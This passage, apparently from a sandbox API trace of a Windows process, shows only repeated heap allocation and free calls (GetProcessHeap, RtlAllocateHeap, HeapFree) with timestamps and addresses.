(HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0113.499] GetProcessHeap () returned 0xe30000 [0113.499] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0113.499] GetProcessHeap () returned 0xe30000 [0113.499] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.499] GetProcessHeap () returned 0xe30000 [0113.499] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.499] GetProcessHeap () returned 0xe30000 [0113.503] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.503] GetProcessHeap () returned 0xe30000 [0113.503] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.503] GetProcessHeap () returned 0xe30000 [0113.503] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0113.503] GetProcessHeap () returned 0xe30000 [0113.503] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0113.503] GetProcessHeap () returned 0xe30000 [0113.503] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.507] GetProcessHeap () returned 0xe30000 [0113.507] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.507] GetProcessHeap () returned 0xe30000 [0113.507] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.508] GetProcessHeap () returned 0xe30000 [0113.508] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.508] GetProcessHeap () returned 0xe30000 [0113.508] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0113.508] GetProcessHeap () returned 0xe30000 [0113.508] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0113.508] GetProcessHeap () returned 0xe30000 [0113.508] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0113.508] GetProcessHeap () returned 0xe30000 [0113.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0113.519] GetProcessHeap () returned 0xe30000 [0113.519] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0114.073] GetProcessHeap () returned 0xe30000 [0114.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0114.073] GetProcessHeap () returned 0xe30000 [0114.073] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0114.073] GetProcessHeap () returned 0xe30000 [0114.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0114.073] GetProcessHeap () returned 0xe30000 [0114.073] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0114.073] GetProcessHeap () returned 0xe30000 [0114.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0114.073] GetProcessHeap () returned 0xe30000 [0114.073] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.073] GetProcessHeap () returned 0xe30000 [0114.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.073] GetProcessHeap () returned 0xe30000 [0114.073] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0114.073] GetProcessHeap () returned 0xe30000 [0114.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0114.073] GetProcessHeap () returned 0xe30000 [0114.073] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0114.073] GetProcessHeap () returned 0xe30000 [0114.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0114.073] GetProcessHeap () returned 0xe30000 [0114.073] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0114.073] GetProcessHeap () returned 0xe30000 [0114.074] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0114.074] GetProcessHeap () returned 0xe30000 [0114.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0114.075] GetProcessHeap () returned 0xe30000 [0114.075] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0114.076] GetProcessHeap () returned 0xe30000 [0114.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.077] GetProcessHeap () returned 0xe30000 [0114.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0114.078] GetProcessHeap () returned 0xe30000 [0114.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.078] GetProcessHeap () returned 0xe30000 [0114.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0114.079] GetProcessHeap () returned 0xe30000 [0114.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0114.080] GetProcessHeap () returned 0xe30000 [0114.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 